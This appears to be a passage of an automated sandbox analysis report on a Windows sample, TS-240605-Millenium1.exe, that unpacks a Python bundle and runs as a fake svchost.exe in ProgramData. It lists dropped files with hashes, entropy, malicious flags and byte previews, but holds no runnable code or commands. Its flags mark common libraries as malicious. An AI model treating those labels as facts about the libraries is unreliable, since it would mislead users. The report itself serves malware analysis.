Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11360
Entropy (8bit):	4.426756947907149
Encrypted:	false
SSDEEP:	192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
MD5:	4E168CCE331E5C827D4C2B68A6200E1B
SHA1:	DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
SHA-256:	AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
SHA-512:	F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
Malicious:	false
Preview:	. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography-42.0.5.dist-info\LICENSE.BSD

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1532
Entropy (8bit):	5.058591167088024
Encrypted:	false
SSDEEP:	24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
MD5:	5AE30BA4123BC4F2FA49AA0B0DCE887B
SHA1:	EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
SHA-256:	602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
SHA-512:	DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
Malicious:	false
Preview:	Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography-42.0.5.dist-info\METADATA

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5430
Entropy (8bit):	5.111831778200942
Encrypted:	false
SSDEEP:	96:DxZpqZink/QIHQIyzQIZQILuQIR8vtklGovuxNx6rIWwCvCCcT+vIrrr9B+M6VwP:xJnkoBs/stL18cT+vIrrxsM6VwDjyeyM
MD5:	AD313397AABF8AF5D234DF73C901CB4D
SHA1:	B213A420B73EACF37409BC428812B3E17F1C12C9
SHA-256:	65479522961A5B9B1C4811232C4133DDC8BDA9BBBC7562B81EF76857A2A2475A
SHA-512:	468BD32AABA49839D4A4752108A378954900037588B7095B318179D64F76F4302ADEBCFA1664CEE5CC390AD0EEA79A611A7B5C372548FEA22DF77C2A459DA2AF
Malicious:	false
Preview:	Metadata-Version: 2.1..Name: cryptography..Version: 42.0.5..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst

C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography-42.0.5.dist-info\RECORD

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	15325
Entropy (8bit):	5.566095103726107
Encrypted:	false
SSDEEP:	192:GXPJofR5jF4e+6tkh4v4Ko29vZ6W1HepPN+NXwvn5ZnM:GXOfbCWPoIvZ6W1HepPN+9wvnA
MD5:	63C3E2671FC695972FAC7F7FA26CA3DB
SHA1:	58A52CA7E0B6F9DE0E89E1DA799EBBD7898D635E
SHA-256:	A443A65BFFDE342F60CA1267DAB2229514073F64AB1BCC08CCCEF42FC015C16D
SHA-512:	4773FC277B176EDC3872D654992B53BF247B8E3ED87D40C43A5ACEB593C88E03EB6E0E200145EEB66C3B0ACDBA4B77107279C2681840405E88AD195976779D87
Malicious:	false
Preview:	cryptography-42.0.5.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-42.0.5.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-42.0.5.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-42.0.5.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-42.0.5.dist-info/METADATA,sha256=ZUeVIpYaW5scSBEjLEEz3ci9qbu8dWK4HvdoV6KiR1o,5430..cryptography-42.0.5.dist-info/RECORD,,..cryptography-42.0.5.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-42.0.5.dist-info/WHEEL,sha256=ZzJfItdlTwUbeh2SvWRPbrqgDfW_djikghnwfRmqFIQ,100..cryptography-42.0.5.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=Q_dIPaB2u54kbfNQMzqmbel-gbG6RC5vWzO6OSFDGqM,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/_

C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography-42.0.5.dist-info\WHEEL

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.0203365408149025
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVlbY3KgP+tkKciH/KQLn:RtBMwlVCxWKTQLn
MD5:	C48772FF6F9F408D7160FE9537E150E0
SHA1:	79D4978B413F7051C3721164812885381DE2FDF5
SHA-256:	67325F22D7654F051B7A1D92BD644F6EBAA00DF5BF7638A48219F07D19AA1484
SHA-512:	A817107D9F70177EA9CA6A370A2A0CB795346C9025388808402797F33144C1BAF7E3DE6406FF9E3D8A3486BDFAA630B90B63935925A36302AB19E4C78179674F
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..

C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography-42.0.5.dist-info\top_level.txt

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	13
Entropy (8bit):	3.2389012566026314
Encrypted:	false
SSDEEP:	3:cOv:Nv
MD5:	E7274BD06FF93210298E7117D11EA631
SHA1:	7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
SHA-256:	28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
SHA-512:	AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
Malicious:	false
Preview:	cryptography.

C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography\hazmat\bindings\_rust.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7218176
Entropy (8bit):	6.56234593155449
Encrypted:	false
SSDEEP:	98304:1CPfKk+AGdmA+xiIfIBE7S2ohqc/3J2y:gPfr3GdmAwjABE7S2ogiJ
MD5:	12A7C0D35CCBD002150BB29DDD7E8440
SHA1:	F16D9A4654DC76B3CFADA387FF7BDDDB0B18B79A
SHA-256:	7E22D579AC503B959268964102C03D4E96C8A9B74186158B8C82FDC8CF9D9522
SHA-512:	C9E5E68DE8F51F91CBBA839B4FECE1DB4DA7480890A6C7318A78DEAA30191FCB8913BA447F45D4AE93B986F3246F09F8CC721E781CE020110A3BB5628B3EF9F7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r.Fs..Fs..Fs..O...Ts.....Ds.....Ws.....Ns.....Bs..\|...Ds..Fs..gq.....Ws..)...0p.....Gs..Fs...s.....Gs.....Gs..RichFs..........................PE..d....A.e.........." ...'.jS...........R.......................................n...........`.........................................`.h.p.....h.\|............Pj..M............m......7c.T....................8c.(....6c.@.............S..............................text....hS......jS................. ..`.rdata........S......nS.............@..@.data....!... i.......i.............@....pdata...M...Pj..N....i.............@..@.reloc........m......Dm.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\libcrypto-1_1.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3450648
Entropy (8bit):	6.098075450035195
Encrypted:	false
SSDEEP:	98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
MD5:	9D7A0C99256C50AFD5B0560BA2548930
SHA1:	76BD9F13597A46F5283AA35C30B53C21976D0824
SHA-256:	9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
SHA-512:	CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.\|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...\|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\libffi-7.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32792
Entropy (8bit):	6.3566777719925565
Encrypted:	false
SSDEEP:	384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
MD5:	EEF7981412BE8EA459064D3090F4B3AA
SHA1:	C60DA4830CE27AFC234B3C3014C583F7F0A5A925
SHA-256:	F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
SHA-512:	DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\libssl-1_1.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	704792
Entropy (8bit):	5.5573527806738126
Encrypted:	false
SSDEEP:	12288:WhO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0TGqwfU2lvz2:2is/POtrzbLp5dQ0TGqcU2lvz2
MD5:	BEC0F86F9DA765E2A02C9237259A7898
SHA1:	3CAA604C3FFF88E71F489977E4293A488FB5671C
SHA-256:	D74CE01319AE6F54483A19375524AA39D9F5FD91F06CF7DF238CA25E043130FD
SHA-512:	FFBC4E5FFDB49704E7AA6D74533E5AF76BBE5DB297713D8E59BD296143FE5F145FBB616B343EED3C48ECEACCCCC2431630470D8975A4A17C37EAFCC12EDD19F4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..\|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".D...T......<................................................i....`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\nacl\_sodium.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	348672
Entropy (8bit):	6.620074456825018
Encrypted:	false
SSDEEP:	6144:PS8ZHilzJNijWKvNpwNasFp2HX5l5XBMC+ZSHUV50DErV4c+:PSEilzJNijfpOSjDz
MD5:	9D1B8BAD0E17E63B9D8E441CDC15BAEE
SHA1:	0C5A62135B072D1951A9D6806B9EFF7AA9C897A3
SHA-256:	D733C23C6A4B21625A4FF07F6562BA882BCBDB0F50826269419D8DE0574F88CD
SHA-512:	49E7F6AB825D5047421641ED4618FF6CB2A8D22A8A4AE1BD8F2DEEFE7987D80C8E0ACC72B950D02214F7B41DC4A42DF73A7F5742EBC96670D1C5A28C47B97355
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................a.........................................................................r.............Rich............PE..d......a.........." .........@......P.....................................................`.............................................P............p.......P..(...............\|...@...............................`...8............0...............................text...H........................... ..`.rdata.......0......................@..@.data....8.......2..................@....pdata..(....P.......,..............@..@.rsrc........p.......J..............@..@.reloc..\|............L..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\pyexpat.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	198936
Entropy (8bit):	6.372446720663998
Encrypted:	false
SSDEEP:	3072:13BAJzkk5dT6F62eqf2A3zVnjIHdAPKReewMP12yGUfT0+SYyWgOmrpjAxvwnVIq:FQg4dT6N5OA3zVnjNed4yGKTKR/
MD5:	1118C1329F82CE9072D908CBD87E197C
SHA1:	C59382178FE695C2C5576DCA47C96B6DE4BBCFFD
SHA-256:	4A2D59993BCE76790C6D923AF81BF404F8E2CB73552E320113663B14CF78748C
SHA-512:	29F1B74E96A95B0B777EF00448DA8BD0844E2F1D8248788A284EC868AE098C774A694D234A00BD991B2D22C2372C34F762CDBD9EC523234861E39C0CA752DCAA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...sn.Jsn.Jsn.Jz.:J.n.J!..Kqn.J!..K.n.J!..K{n.J!..Kpn.J...Kqn.J8..Kpn.Jsn.J.n.J...Kwn.J...Krn.J..VJrn.J...Krn.JRichsn.J................PE..d.....,d.........." ......................................................................`.........................................p...P................................/...........4..T...........................05..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\python3.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	66328
Entropy (8bit):	6.162953246481027
Encrypted:	false
SSDEEP:	768:t68LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqn:t6wewnvtjnsfwxVILL0S7SyuPxHO
MD5:	FD4A39E7C1F7F07CF635145A2AF0DC3A
SHA1:	05292BA14ACC978BB195818499A294028AB644BD
SHA-256:	DC909EB798A23BA8EE9F8E3F307D97755BC0D2DC0CB342CEDAE81FBBAD32A8A9
SHA-512:	37D3218BC767C44E8197555D3FA18D5AAD43A536CFE24AC17BF8A3084FB70BD4763CCFD16D2DF405538B657F720871E0CD312DFEB7F592F3AAC34D9D00D5A643
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.d.A.d.A.d...l.@.d...d.@.d.....@.d...f.@.d.RichA.d.........PE..d.....,d.........." .................................................................x....`.........................................`...`................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\python310.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4458776
Entropy (8bit):	6.460390021076921
Encrypted:	false
SSDEEP:	49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
MD5:	63A1FA9259A35EAEAC04174CECB90048
SHA1:	0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
SHA-256:	14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
SHA-512:	896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.\|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\select.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29976
Entropy (8bit):	6.627859470728624
Encrypted:	false
SSDEEP:	768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
MD5:	A653F35D05D2F6DEBC5D34DADDD3DFA1
SHA1:	1A2CEEC28EA44388F412420425665C3781AF2435
SHA-256:	DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
SHA-512:	5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\ucrtbase.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1016584
Entropy (8bit):	6.669319438805479
Encrypted:	false
SSDEEP:	24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
MD5:	0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
SHA1:	4189F4459C54E69C6D3155A82524BDA7549A75A6
SHA-256:	8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
SHA-512:	A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\unicodedata.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1123608
Entropy (8bit):	5.3853088605790385
Encrypted:	false
SSDEEP:	12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
MD5:	81D62AD36CBDDB4E57A91018F3C0816E
SHA1:	FE4A4FC35DF240B50DB22B35824E4826059A807B
SHA-256:	1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
SHA-512:	7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\wrapt\_wrappers.cp310-win_amd64.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.307092802083391
Encrypted:	false
SSDEEP:	384:frtPrRtr4IXhjSwZQ41tsSWEJwrhmf6mvgkoOIB/5k7jKWboNeMCKAODeNaoL5I1:f5br54WmB/aENyKAODhSoLkCpIk
MD5:	7E65EFC6C3B12A403A110056141FF14E
SHA1:	144845210FE97AF7D8570713BAE944CCBBD9BF16
SHA-256:	8267AC2A59BA26CDAF4B347A8C92D26ACB1E261AFFFFE1D160F9153372363A64
SHA-512:	3B37C27825CA85BF96E28BB2F7545A29BA595E19E8D78C9C1912CBC4EB7349CC3F9B52A466D0E7FB537E646AB2BB1F704D2B59389ABEA5F4C2733DA74F3A3380
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..^W..^W..^W..W/M.\W..K(..\W.../..\W..K(..UW..K(..VW..K(..]W.."..]W..^W...W..g..._W..g..._W..g.!._W..g..._W..Rich^W..........................PE..d....yLe.........." ...%.H...H.......M....................................................`..........................................r..d...tr..d...................................`k.............................. j..@............`...............................text....G.......H.................. ..`.rdata...!...`..."...L..............@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32972420
Entropy (8bit):	7.999533007852075
Encrypted:	true
SSDEEP:	786432:ivIFT9qEz9FgYXhP8iFopWjUhcNrMzws9J:ivET0EJFg0RFypWQhcNrMEsD
MD5:	B72CBBAF7F2E3E31E90944AC747798D3
SHA1:	AFEA9F6DD9F56B470BA90C736A00BD5AFD58F48E
SHA-256:	276A8E849C7DF0FEAE92DE095EA3EA515EB3E41C48DD326737D4E24E710899C3
SHA-512:	4DD915848889A6DD2725F5CDEEA749FBD4DDD15348C298D45E82E7488BA81A866D3DBB25A35CEEB2524C72C8D46390B0BFA4A0334EACF75CAAB3E40F641D6098
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..6..6..6....V.6....T.'6....U.6..)MZ.6..)M..6..)M..6..)M..6..N$.6..N4.6..6..7..'M..6..'M..6..'MX.6..'M..6..Rich.6..................PE..L......e...............!.F..........P........`....@.......................................@.............................4.......P.......D....................p..\%......T...............................@............`..x....... ....................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...XG... ......................@....didat.......p......................@....rsrc...D...........................@..@.reloc..\%...p...&..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75642\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119192
Entropy (8bit):	6.6016214745004635
Encrypted:	false
SSDEEP:	1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
MD5:	BE8DBE2DC77EBE7F88F910C61AEC691A
SHA1:	A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
SHA-256:	4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
SHA-512:	0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75642\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49432
Entropy (8bit):	7.811017693834739
Encrypted:	false
SSDEEP:	1536:lBEQ3cqbneddmWEADRew62fIYCVWZ7Symxs:lB53cqbn0YZaIYCVWZL
MD5:	3BD0DD2ED98FCA486EC23C42A12978A8
SHA1:	63DF559F4F1A96EB84028DC06EAEB0EF43551ACD
SHA-256:	6BEB733F2E27D25617D880559299FBEBD6A9DAC51D6A9D0AB14AE6DF9877DA07
SHA-512:	9FFA7DA0E57D98B8FD6B71BC5984118EA0B23BF11EA3F377DABB45B42F2C8757216BC38DDD05B50C0BC1C69C23754319CEF9FFC662D4199F7C7E038A0FB18254
Malicious:	true
